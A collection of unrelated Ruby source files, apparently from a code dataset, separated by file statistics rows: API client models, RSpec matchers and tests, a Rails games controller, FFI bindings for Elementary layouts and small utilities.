The PostFinance Checkout API allows an easy interaction with the PostFinance Checkout web service.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module PostFinanceCheckout
class TransactionState
CREATE = 'CREATE'.freeze
PENDING = 'PENDING'.freeze
CONFIRMED = 'CONFIRMED'.freeze
PROCESSING = 'PROCESSING'.freeze
FAILED = 'FAILED'.freeze
AUTHORIZED = 'AUTHORIZED'.freeze
VOIDED = 'VOIDED'.freeze
COMPLETED = 'COMPLETED'.freeze
FULFILL = 'FULFILL'.freeze
DECLINE = 'DECLINE'.freeze
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def build_from_hash(value)
constantValues = TransactionState.constants.select { |c| TransactionState::const_get(c) == value }
raise "Invalid ENUM value #{value} for class #TransactionState" if constantValues.empty?
value
end
end
end
| 32.454545 | 104 | 0.738095 |
26f71f1cf06460662b50b6b2aece3f433049a850 | 109 | FactoryBot.define do
factory :investigation_kind do
name "MyString"
description "MyText"
end
end
| 15.571429 | 32 | 0.733945 |
87e0b37ae36a7a417885e178aefc085dc4ef84fe | 1,733 | # MIT License
#
# Copyright 2019 Niklas Schultz.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# The BitInByte object represents a single bit inside a byte value.
# It accepts its bit position, which must be in the range
# of 1-8, and the actual byte value, which must be in the range of 0-255.
# The byte value may be decimal, hex, octal, or binary.
#
# author:: Niklas Schultz
# version:: 0.1.2
# license:: MIT
class BitInByte
def initialize(pos, byte)
@pos = pos
@byte = byte
end
def value
raise ArgumentError, 'pos must be 1-8' if @pos <= 0 || @pos > 8
raise ArgumentError, 'byte must be 0-255' if @byte < 0 || @byte > 255
position = @pos - 1
((1 << position) & @byte) != 0
end
end
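# Illustrative usage (a minimal sketch; 0xAA == 0b10101010, bit positions are
# counted from 1 at the least significant bit):
if $PROGRAM_NAME == __FILE__
  puts BitInByte.new(1, 0xAA).value # => false
  puts BitInByte.new(2, 0xAA).value # => true
  puts BitInByte.new(8, 0xAA).value # => true
end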
| 38.511111 | 79 | 0.732833 |
79f1c69a08d253c4fe5f9f96a33896b39880b597 | 928 | # frozen_string_literal: true
RSpec.shared_context 'with associated error handler setup' do
let(:association_name) { 'foos' }
let(:record_num) { 0 }
let(:error) { instance_double(ActiveModel::Error) }
before { allow(error).to receive(:attribute).and_return('bar') }
end
RSpec.shared_examples 'a govuk design system associated error handler' do
describe '#associated_error_attribute' do
subject { validator.associated_error_attribute(association_name, record_num, error) }
include_context 'with associated error handler setup'
it { is_expected.to eql('foos_attributes_0_bar') }
end
end
RSpec.shared_examples 'a custom CCCD associated error handler' do
describe '#associated_error_attribute' do
subject { validator.associated_error_attribute(association_name, record_num, error) }
include_context 'with associated error handler setup'
it { is_expected.to eql('foo_1_bar') }
end
end
| 30.933333 | 89 | 0.762931 |
ac0372279b0c73c2d6a6c6881d97971847e0ef72 | 1,256 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Storage::Mgmt::V2018_03_01_preview
module Models
#
# The List service SAS credentials operation response.
#
class ListServiceSasResponse
include MsRestAzure
# @return [String] List service SAS credentials of specific resource.
attr_accessor :service_sas_token
#
# Mapper for ListServiceSasResponse class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListServiceSasResponse',
type: {
name: 'Composite',
class_name: 'ListServiceSasResponse',
model_properties: {
service_sas_token: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'serviceSasToken',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.166667 | 75 | 0.575637 |
28da9a8f30b056a8b6da9898cabb251d0f73b8b0 | 336 | require 'test_helper'
class InboxControllerTest < ActionController::TestCase
=begin
test "should get index" do
get :index
assert_response :success
end
test "should get show" do
get :show
assert_response :success
end
test "should get destroy" do
get :destroy
assert_response :success
end
=end
end
| 15.272727 | 54 | 0.708333 |
f8fd316314d4b486c477d77103cd065346027bf7 | 1,224 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-directoryservice'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Directory Service'
spec.description = 'Official AWS Ruby gem for AWS Directory Service (Directory Service). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-directoryservice',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-directoryservice/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.112.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
| 38.25 | 135 | 0.675654 |
7aba2f1a3d543fbfd47d6d9b58906b2129bc4d58 | 576 | # frozen_string_literal: true
require 'semlogr/self_logger'
module Semlogr
module Sinks
class Filtering
def initialize(filters, sink)
@filters = filters
@sink = sink
end
def emit(log_event)
filtered = @filters.any? do |filter|
begin
filter.call(log_event)
rescue StandardError => e
SelfLogger.error("Failed to filter log event using filter #{filter.class}", e)
false
end
end
@sink.emit(log_event) unless filtered
end
end
end
end
| 19.862069 | 90 | 0.585069 |
bb6319321dd652f146b13b3c9c0a7d752143e37e | 2,969 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2016, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example gets all base rates belonging to a rate card.
require 'ad_manager_api'
def get_base_rates_for_rate_card(ad_manager, rate_card_id)
base_rate_service = ad_manager.service(:BaseRateService, API_VERSION)
# Create a statement to select base rates.
statement = ad_manager.new_statement_builder do |sb|
sb.where = 'rateCardId = :rate_card_id'
sb.with_bind_variable('rate_card_id', rate_card_id)
end
# Retrieve a small amount of base rates at a time, paging
# through until all base rates have been retrieved.
page = {:total_result_set_size => 0}
begin
# Get the base rates by statement.
page = base_rate_service.get_base_rates_by_statement(
statement.to_statement()
)
# Print out some information for each base rate.
unless page[:results].nil?
page[:results].each_with_index do |base_rate, index|
        puts ('%d) Base rate with ID %d, type "%s", and rate card ID %d was ' +
            'found.') % [index + statement.offset, base_rate[:id],
            base_rate[:xsi_type], base_rate[:rate_card_id]]
end
end
# Increase the statement offset by the page size to get the next page.
statement.offset += statement.limit
end while statement.offset < page[:total_result_set_size]
puts 'Total number of base rates: %d' % page[:total_result_set_size]
end
if __FILE__ == $0
API_VERSION = :v201805
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
rate_card_id = 'INSERT_RATE_CARD_ID_HERE'.to_i
get_base_rates_for_rate_card(ad_manager, rate_card_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 34.523256 | 79 | 0.687774 |
21fbb68cda5fe419cf5766675868083ed5f3c60a | 2,502 | require File.expand_path(File.dirname(__FILE__) + '/test_helper.rb')
class TestFakerMeasurement < Test::Unit::TestCase
def setup
@tester = Faker::Measurement
end
def height
assert @tester.height.match(/\d\s[a-z]/)
assert @tester.height(1).match(/\d\s[a-z]/)
end
def height_all
assert @tester.height_all.match(/\d\s[a-z]/)
end
def height_none
assert @tester.height_none.match(/\d\s[a-z]/)
end
def length
assert @tester.length.match(/\d\s[a-z]/)
end
def length_all
assert @tester.length_all.match(/\d\s[a-z]/)
end
def length_none
assert @tester.length_none.match(/\d\s[a-z]/)
end
def volume
custom_amount_float = @tester.volume(1.5)
custom_amount_integer = @tester.volume(276)
assert @tester.volume.match(/\d\s[a-z]/)
assert custom_amount_float.match(/\d\s[a-z]+[s]\z/)
assert custom_amount_integer.match(/\d\s[a-z]+[s]\z/)
end
def volume_all
assert @tester.volume_all.match(/\A\D+[^s]\z/)
end
def volume_none
assert @tester.volume_none.match(/\A\D+[^s]\z/)
end
def weight
assert @tester.weight.match(/\d\s[a-z]/)
end
def weight_none
assert @tester.weight_none.match(/\d\s[a-z]/)
end
def weight_all
assert @tester.weight_all.match(/\d\s[a-z]/)
end
def metric_height
assert @tester.metric_height.match(/\d\s[a-z]/)
end
def metric_height_all
assert @tester.metric_height_all.match(/\d\s[a-z]/)
end
def metric_height_none
assert @tester.metric_height_none.match(/\d\s[a-z]/)
end
def metric_length
assert @tester.metric_length.match(/\d\s[a-z]/)
end
def metric_length_all
assert @tester.metric_length_all.match(/\d\s[a-z]/)
end
def metric_length_none
assert @tester.metric_length_none.match(/\d\s[a-z]/)
end
def metric_volume
assert @tester.metric_volume.match(/\d\s[a-z]/)
end
def metric_volume_all
assert @tester.metric_volume_all.match(/\d\s[a-z]/)
end
def metric_volume_none
assert @tester.metric_volume_none.match(/\d\s[a-z]/)
end
def metric_weight
assert @tester.metric_weight.match(/\d\s[a-z]/)
assert @tester.metric_weight(1).match(/\d\s[a-z]/)
end
def metric_weight_all
assert @tester.metric_weight_all.match(/\d\s[a-z]/)
end
def metric_weight_none
assert @tester.metric_weight_none.match(/\d\s[a-z]/)
end
def test_invalid_amount_error
amount = 'hello world!'
assert_raise ArgumentError do
@tester.volume(amount)
end
end
end
| 21.02521 | 68 | 0.671463 |
26426ac9df226b4eb6df95a97bd0b5ce86dae4b3 | 553 | class CspcrGel < ActiveRecord::Base
belongs_to :user
belongs_to :protocol
belongs_to :status
has_many :cspcr_gel_lanes
has_many :cspcr_products, :through => :cspcr_gel_lanes
has_many :cspcr_gel_images
scope :pendings, where(:status_id => Status.find_by_process_and_name(CspcrGel.to_s,:pending))
accepts_nested_attributes_for :cspcr_gel_lanes, :cspcr_gel_images
attr_accessible :cspcr_gel_lanes, :cspcr_product_ids, :cspcr_gel_lanes_attributes, :status_id, :note
validates :cspcr_products, :presence => :true
end
| 27.65 | 102 | 0.77396 |
ffd38ca826d6b5d909147a76af4c0be9745a94b6 | 840 | require "spec_helper"
describe Docks::Tags::Factory do
subject { Docks::Tags::Factory.instance }
it "does not allow multiline content" do
expect(subject.multiline?).to be false
end
it "only allows one tag per block" do
expect(subject.multiple_allowed?).to be false
end
describe "#process" do
it "marks the attribute as true" do
symbol = Docks::Containers::Symbol.new(name: "foo", factory: "")
Docks::Process.process(symbol)
expect(symbol[subject.name]).to be true
end
it "converts the symbol to be a factory container" do
symbol = Docks::Containers::Function.new(factory: "", name: "foo")
symbol = Docks::Process.process(symbol)
expect(symbol).to be_a Docks::Containers::Factory
expect(symbol.symbol_type).to eq Docks::Types::Symbol::FACTORY
end
end
end
| 28 | 72 | 0.684524 |
61ff6e2eddca09b5f703ea221493d3fa097bbe59 | 1,672 | require 'rails_helper'
RSpec.configure do |config|
# Specify a root folder where Swagger JSON files are generated
# NOTE: If you're using the rswag-api to serve API descriptions, you'll need
# to ensure that it's configured to serve Swagger from the same folder
config.swagger_root = Rails.root.to_s + '/swagger'
# Define one or more Swagger documents and provide global metadata for each one
# When you run the 'rswag:specs:to_swagger' rake task, the complete Swagger will
# be generated at the provided relative path under swagger_root
# By default, the operations defined in spec files are added to the first
# document below. You can override this behavior by adding a swagger_doc tag to the
# the root example_group in your specs, e.g. describe '...', swagger_doc: 'v2/swagger.json'
config.swagger_docs = {
'v1/swagger.json' => {
swagger: '2.0',
info: {
title: 'OwnYourData Data Vault API',
version: 'v1',
"description": "The data vault is the central element for securley storing personal data with OwnYourData.\n \n Further information:\n - learn more about the Data Vault at https://data-vault.eu\n - view other [OwnYourData Service API's](https://api-docs.ownyourdata.eu)",
"contact": {
"email": "[email protected]"
},
"license": {
"name": "MIT License",
"url": "https://opensource.org/licenses/MIT"
}
},
paths: {},
securityDefinitions: {
Bearer: {
description: "Authorization token",
type: :apiKey,
name: 'Authorization',
in: :header
}
}
}
}
end
| 39.809524 | 279 | 0.649522 |
1db4072a56982b691bb5e9b6ef61dac1919832d6 | 7,005 | #! /usr/bin/env ruby
# -*- coding: UTF-8 -*-
#
require 'efl/native'
require 'efl/native/edje'
require 'efl/native/elementary'
#
module Efl
#
module ElmLayout
#
FCT_PREFIX = 'elm_layout_' unless const_defined? :FCT_PREFIX
#
def self.method_missing meth, *args, &block
sym = Efl::MethodResolver.resolve self, meth, FCT_PREFIX
self.send sym, *args, &block
end
#
end
#
module Native
#
ffi_lib 'elementary.so.1'
#
# FUNCTIONS
fcts = [
# EAPI Evas_Object *elm_layout_add(Evas_Object *parent);
[ :elm_layout_add, [ :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_file_set(Evas_Object *obj, const char *file, const char *group);
[ :elm_layout_file_set, [ :evas_object, :string, :string ], :bool ],
# EAPI int elm_layout_freeze(Evas_Object *obj);
[ :elm_layout_freeze, [ :evas_object ], :int ],
# EAPI int elm_layout_thaw(Evas_Object *obj);
[ :elm_layout_thaw, [ :evas_object ], :int ],
# EAPI Eina_Bool elm_layout_theme_set(Evas_Object *obj, const char *clas, const char *group, const char *style);
[ :elm_layout_theme_set, [ :evas_object, :string, :string, :string ], :bool ],
# EAPI void elm_layout_signal_emit(Evas_Object *obj, const char *emission, const char *source);
[ :elm_layout_signal_emit, [ :evas_object, :string, :string ], :void ],
# EAPI void elm_layout_signal_callback_add(Evas_Object *obj, const char *emission, const char *source, Edje_Signal_Cb func, void *data);
[ :elm_layout_signal_callback_add, [ :evas_object, :string, :string, :edje_signal_cb, :pointer ], :void ],
# EAPI void *elm_layout_signal_callback_del(Evas_Object *obj, const char *emission, const char *source, Edje_Signal_Cb func);
[ :elm_layout_signal_callback_del, [ :evas_object, :string, :string, :edje_signal_cb ], :pointer ],
# EAPI Eina_Bool elm_layout_box_append(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_append, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_prepend(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_prepend, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_insert_before(Evas_Object *obj, const char *part, Evas_Object *child, const Evas_Object *reference);
[ :elm_layout_box_insert_before, [ :evas_object, :string, :evas_object, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_insert_at(Evas_Object *obj, const char *part, Evas_Object *child, unsigned int pos);
[ :elm_layout_box_insert_at, [ :evas_object, :string, :evas_object, :uint ], :bool ],
# EAPI Evas_Object *elm_layout_box_remove(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_remove, [ :evas_object, :string, :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_box_remove_all(Evas_Object *obj, const char *part, Eina_Bool clear);
[ :elm_layout_box_remove_all, [ :evas_object, :string, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_table_pack(Evas_Object *obj, const char *part, Evas_Object *child_obj, unsigned short col, unsigned short row, unsigned short colspan, unsigned short rowspan);
[ :elm_layout_table_pack, [ :evas_object, :string, :evas_object, :ushort, :ushort, :ushort, :ushort ], :bool ],
# EAPI Evas_Object *elm_layout_table_unpack(Evas_Object *obj, const char *part, Evas_Object *child_obj);
[ :elm_layout_table_unpack, [ :evas_object, :string, :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_table_clear(Evas_Object *obj, const char *part, Eina_Bool clear);
[ :elm_layout_table_clear, [ :evas_object, :string, :bool ], :bool ],
# EAPI Evas_Object *elm_layout_edje_get(const Evas_Object *obj);
[ :elm_layout_edje_get, [ :evas_object ], :evas_object ],
# EAPI const char *elm_layout_data_get(const Evas_Object *obj, const char *key);
[ :elm_layout_data_get, [ :evas_object, :string ], :string ],
# EAPI void elm_layout_sizing_eval(Evas_Object *obj);
[ :elm_layout_sizing_eval, [ :evas_object ], :void ],
# EAPI Eina_Bool elm_layout_part_cursor_set(Evas_Object *obj, const char *part_name, const char *cursor);
[ :elm_layout_part_cursor_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_part_cursor_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_get, [ :evas_object, :string ], :string ],
# EAPI Eina_Bool elm_layout_part_cursor_unset(Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_unset, [ :evas_object, :string ], :bool ],
# EAPI Eina_Bool elm_layout_part_cursor_style_set(Evas_Object *obj, const char *part_name, const char *style);
[ :elm_layout_part_cursor_style_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_part_cursor_style_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_style_get, [ :evas_object, :string ], :string ],
# EAPI Eina_Bool elm_layout_part_cursor_engine_only_set(Evas_Object *obj, const char *part_name, Eina_Bool engine_only);
[ :elm_layout_part_cursor_engine_only_set, [ :evas_object, :string, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_edje_object_can_access_set(Evas_Object *obj, Eina_Bool can_access);
[ :elm_layout_edje_object_can_access_set, [ :evas_object, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_edje_object_can_access_get(Evas_Object *obj);
[ :elm_layout_edje_object_can_access_get, [ :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_part_cursor_engine_only_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_engine_only_get, [ :evas_object, :string ], :bool ],
# EAPI Eina_Bool elm_layout_content_set(Evas_Object *obj, const char *swallow, Evas_Object *content);
[ :elm_layout_content_set, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Evas_Object *elm_layout_content_get(const Evas_Object *obj, const char *swallow);
[ :elm_layout_content_get, [ :evas_object, :string ], :evas_object ],
# EAPI Evas_Object *elm_layout_content_unset(Evas_Object *obj, const char *swallow);
[ :elm_layout_content_unset, [ :evas_object, :string ], :evas_object ],
# EAPI Eina_Bool elm_layout_text_set(Evas_Object *obj, const char *part, const char *text);
[ :elm_layout_text_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_text_get(const Evas_Object *obj, const char *part);
[ :elm_layout_text_get, [ :evas_object, :string ], :string ],
]
#
attach_fcts fcts
#
end
end
#
# EOF
| 68.009709 | 195 | 0.683369 |
bf5d05de5ac5e0c9bcf5c9b0e570d4e7270c54bb | 477 | module ActiveMerchant
module Billing
class AmazonResponse < Response
attr_reader :constraints, :state, :destination, :email, :total
def initialize(success, message, params = {}, options = {})
@constraints = options[:constraints]
@state = options[:state]
@destination = options[:destination]
@email = options[:email]
@total = options[:total]
super(success, message, params, options)
end
end
end
end
| 28.058824 | 68 | 0.631027 |
b9028f3ce3f92767ca8fc83a582de964b2927344 | 613 | module PuppetX
module Sensuclassic
module ToType
def to_type(value)
if value.is_a?(Hash)
new = Hash.new
value.each { |k,v| new[k] = to_type v }
new
elsif value.is_a?(Array)
value.collect { |v| to_type v }
else
case value
when true, 'true', 'True', :true
true
when false, 'false', 'False', :false
false
when :undef
'undef'
when /^([0-9])+$/
value.to_i
else
value
end
end
end
end
end
end
| 20.433333 | 49 | 0.442088 |
ac19f8230806e092ed530ce6f0b393715766eef7 | 2,476 | class Api::V1::GamesController < ApplicationController
before_action :set_game, only: [:show, :show_genre, :update, :destroy, :wishlist, :destroy_wishlist]
# acts_as_token_authentication_handler_for User, only: [:create, :update, :destroy, :wishlist, :destroy_wishlist]
# before_action :isAdmin?, only: [:create, :update, :destroy]
def index
game = Game.all
render json: game
end
def show
render json: @game
end
def show_genre
gg = GameGenre.where(game_id: @game.id)
render json: gg
end
def create
game = Game.create(game_params)
if game.save
render json: game, status: :created
else
render json: game.errors, status: :unprocessable_entity
end
end
def update
if @game.update(game_params)
render json: @game
else
render json: @game.errors, status: :unprocessable_entity
end
end
def destroy
if @game.destroy
render json: {status: 'Success', message: 'Jogo apagado com sucesso'}
else
render json: { status: 'Error', message: 'Falha ao apagar o jogo'}, status: :unprocessable_entity
end
end
# Wishlist
def wishlist
wishlist = Wishlist.create(wishlist_params)
wishlist.game_id = @game.id
if wishlist.save
render json: wishlist, status: :created
else
render json: wishlist.errors.full_messages, status: :unprocessable_entity
end
end
def destroy_wishlist
user = User.find(params[:user])
puts "\n\n\n usuario #{user} \n\n\n"
if Wishlist.find_by(game_id: @game.id, user_id: user).present?
wishlist = Wishlist.find_by(game_id: @game.id, user_id: user)
if wishlist.destroy
render json: {status: 'Success', message: 'Jogo removido da sua lista de desejo'}
else
render json: { status: 'Error', message: 'Falha ao remover jogo da sua lista de desejo'}, status: :unprocessable_entity
end
else
render json: { status: 'Error', message: 'Falha ao encontrar o jogo na lista de desejo'}, status: :not_found
end
end
private
def set_game
unless Game.exists?(params[:id])
render json: { status: 'Error', message: 'Falha ao encontrar o jogo'}, status: :not_found
else
@game = Game.find(params[:id])
end
end
def game_params
params.require(:game).permit(:name, :price, :description, :developer, :trailer, :realese_date, images: [])
end
def wishlist_params
params.require(:wishlist).permit(:user_id)
end
end | 28.136364 | 127 | 0.67084 |
ed42a017ca945eb102f01222a0cad607d34ccef6 | 53 | class City < ApplicationRecord
has_many :works
end
| 13.25 | 30 | 0.792453 |
6aafdcf69435c3cceb5770eb3d1e1e6bf9b1185a | 175 | json.extract!(person,:id, :name, :surname, :cpf, :date_of_birth, :email, :created_at, :updated_at,
:license, :phones)
json.url person_url(person, format: :json)
| 43.75 | 98 | 0.668571 |
abe3dc02a032cda7ab78b4053fb6d84a42068f1f | 3,363 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::KeyVault::V2015_06_01
module Models
#
# Properties of the X509 component of a certificate.
#
class X509CertificateProperties
include MsRestAzure
# @return [String] The subject name. Should be a valid X509 Distinguished
# Name.
attr_accessor :subject
# @return [Array<String>] The enhanced key usage.
attr_accessor :ekus
# @return [SubjectAlternativeNames] The subject alternative names.
attr_accessor :subject_alternative_names
# @return [Array<KeyUsageType>] List of key usages.
attr_accessor :key_usage
# @return [Integer] The duration that the certificate is valid in months.
attr_accessor :validity_in_months
#
# Mapper for X509CertificateProperties class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'X509CertificateProperties',
type: {
name: 'Composite',
class_name: 'X509CertificateProperties',
model_properties: {
subject: {
client_side_validation: true,
required: false,
serialized_name: 'subject',
type: {
name: 'String'
}
},
ekus: {
client_side_validation: true,
required: false,
serialized_name: 'ekus',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
subject_alternative_names: {
client_side_validation: true,
required: false,
serialized_name: 'sans',
type: {
name: 'Composite',
class_name: 'SubjectAlternativeNames'
}
},
key_usage: {
client_side_validation: true,
required: false,
serialized_name: 'key_usage',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'KeyUsageTypeElementType',
type: {
name: 'String'
}
}
}
},
validity_in_months: {
client_side_validation: true,
required: false,
serialized_name: 'validity_months',
constraints: {
InclusiveMinimum: 0
},
type: {
name: 'Number'
}
}
}
}
}
end
end
end
end
| 30.026786 | 79 | 0.475171 |
e299f5a4ade6988d93ef166d7bc226c387d82120 | 1,312 | require 'guard/dsl'
require 'guardfile/dsl/action'
require 'guardfile/dsl/change'
module Guard
class Dsl
def run action
Action.new(self, action)
end
def on_change_in *patterns, &action
return Change.new(self, patterns) unless block_given?
patterns.each do |pattern|
UI.info "Watching #{pattern}"
watch(pattern_regexp(pattern)) do |match_data|
UI.info "Change in: #{fill_with_matches(pattern, match_data)}"
build_action(action.call, match_data)
end
end
end
def method_missing method, options = {}, &action
super unless method.to_s =~ /^with_(.+)$/
guard($1, options) do
rules = action.call
next unless rules.is_a? Hash
rules.each do |command, patterns|
on_change_in(*Array(patterns)){ command }
end
end
end
private
def fill_with_matches string, match_data
string.gsub(?*).each_with_index{ |_, i| match_data[i+1] }
end
def build_action command, match_data
case command
when String
fill_with_matches(command, match_data)
when Proc
command.call
else
command
end
end
def pattern_regexp pattern
/^#{Regexp.escape(pattern).gsub('\\*', '(.*)')}$/i
end
end
end
| 22.62069 | 72 | 0.615091 |
6113c3179d4c2e0167e1a5d7344983374c5056b9 | 1,148 | module Store
module Assocs
def to_associations_pk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:resource_pk] = val
end
def to_associations_occurrence_fk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:occurrence_resource_fk] = val
end
def to_associations_target_occurrence_fk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:target_occurrence_resource_fk] = val
end
def to_associations_predicate(field, val)
@models[:assoc] ||= {}
@models[:assoc][:predicate] = val
end
def to_associations_source(field, val)
@models[:assoc] ||= {}
@models[:assoc][:source] = val
end
def to_associations_ref_fks(field, val)
@models[:assoc] ||= {}
@models[:assoc][:ref_sep] ||= field.submapping
@models[:assoc][:ref_fks] = val
end
def to_associations_meta(field, val)
@models[:assoc] ||= {}
@models[:assoc][:meta] ||= {}
@models[:assoc][:meta][field.submapping] = val
end
# NOTE: JH said it's okay to skip these for MVP.
# def to_traits_attributions_fk(field, val)
# end
end
end
| 25.511111 | 59 | 0.608885 |
e9d69373fe98502c02ab4ec9a4baf5131d73ed9d | 807 | require 'daimon/exhibition/model'
require 'daimon/exhibition/controller'
module Daimon
module Exhibition
class Engine < ::Rails::Engine
isolate_namespace Daimon::Exhibition
initializer 'daimon-exhibition.setup' do |app|
ActiveSupport.on_load :active_record do
ActiveRecord::Base.singleton_class.prepend Module.new {
def inherited(base)
super
base.include Model unless base < Model
end
}
end
ActiveSupport.on_load :action_controller do
ActionController::Base.singleton_class.prepend Module.new {
def inherited(base)
super
base.include Controller unless base < Controller
end
}
end
end
end
end
end
| 24.454545 | 69 | 0.608426 |
5d2fbab328aef7a0a45e22ab522a1d6de29b411a | 115 | class HeartbeatController < CalsBaseController
skip_before_action :authenticate_with_cwds
def show
end
end
| 14.375 | 46 | 0.826087 |
1166f8caeaf698c11ae0b195eb933de56508a0c9 | 1,771 |
module RSpec
module Matchers
module Sequel
# TODO: refactor with Sequel API
# http://www.rubydoc.info/gems/sequel/4.13.0/Sequel/Postgres/EnumDatabaseMethods
class HaveEnum
def matches?(db)
@db = db
enum_exists? && with_valid_values?
end
def failure_message_when_negated
"expected database not to #{@description} #{@error}"
end
def failure_message
"expected database to #{description} #{@error}"
end
def with_values(*values)
@enum_values = values.flatten
self
end
private
def description
text = [%(have enum named "#{@enum_name}")]
text << %(with values "#{@enum_values}") unless @enum_values.empty?
text.join(' ')
end
def enum_exists?
          !!@db.fetch("SELECT '#{@enum_name}'::regtype;").first
rescue ::Sequel::DatabaseError => e
if e.message[0..18] == 'PG::UndefinedObject'
@error = "but it doesn't exist"
return false
end
raise e
end
def with_valid_values?
return true if @enum_values.empty?
sql = "SELECT e.enumlabel FROM pg_enum e JOIN pg_type t ON t.oid = e.enumtypid WHERE t.typname = '#{@enum_name}';"
values = @db.fetch(sql).map { |enum| enum[:enumlabel] }
if @enum_values.sort == values.sort
true
else
@error = "but got #{values}"
false
end
end
def initialize(enum_name)
@enum_values = []
@enum_name = enum_name
end
end
def have_enum(enum_name)
HaveEnum.new(enum_name)
end
end
end
end
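# Illustrative usage sketch (not part of the original gem): assuming the matcher
# module is included into RSpec and `db` is an open Sequel Postgres connection,
# the matcher defined above can be used roughly like this:
#
#   RSpec.configure { |config| config.include RSpec::Matchers::Sequel }
#
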